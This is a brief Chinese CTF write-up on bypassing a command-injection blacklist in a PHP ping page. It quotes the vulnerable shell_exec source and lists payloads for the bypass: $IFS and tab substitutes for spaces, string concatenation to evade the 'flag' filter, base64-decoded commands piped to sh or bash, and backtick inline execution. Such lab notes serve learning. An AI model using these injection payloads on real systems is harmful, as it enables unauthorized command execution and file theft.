linux绕空格和字符
题目源码
/?ip= PING 1 (0.0.0.1): 56 data bytes /?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); die("fxck your symbol!"); } else if(preg_match("/ /", $ip)){ die("fxck your space!"); } else if(preg_match("/bash/", $ip)){ die("fxck your bash!"); } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){ die("fxck your flag!"); } $a = shell_exec("ping -c 4 ".$ip); echo " "; print_r($a); } ?>
空格
#%20(space)、%09(tab)、$IFS$9、${IFS}$9、 {IFS}、IFS IFS是分隔符 cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt
字符
# 字符串拼接绕过
?ip=1;a=g;cat$IFS$1fla$a.php;
# base64绕过
?ip=1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
?ip=1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|bash
内联执行 (需要把ls的输出结果flag.php)
ip=127.0.0.1;cat$IFS$9`ls`
内联,就是将反引号内命令的输出作为输入执行。
Bash和sh的区别
sh 遵循POSIX规范:“当某行代码出错时,不继续往下解释”。bash 就算出错,也会继续向下执行
sh可以理解为bash的子集,sh是特殊的bash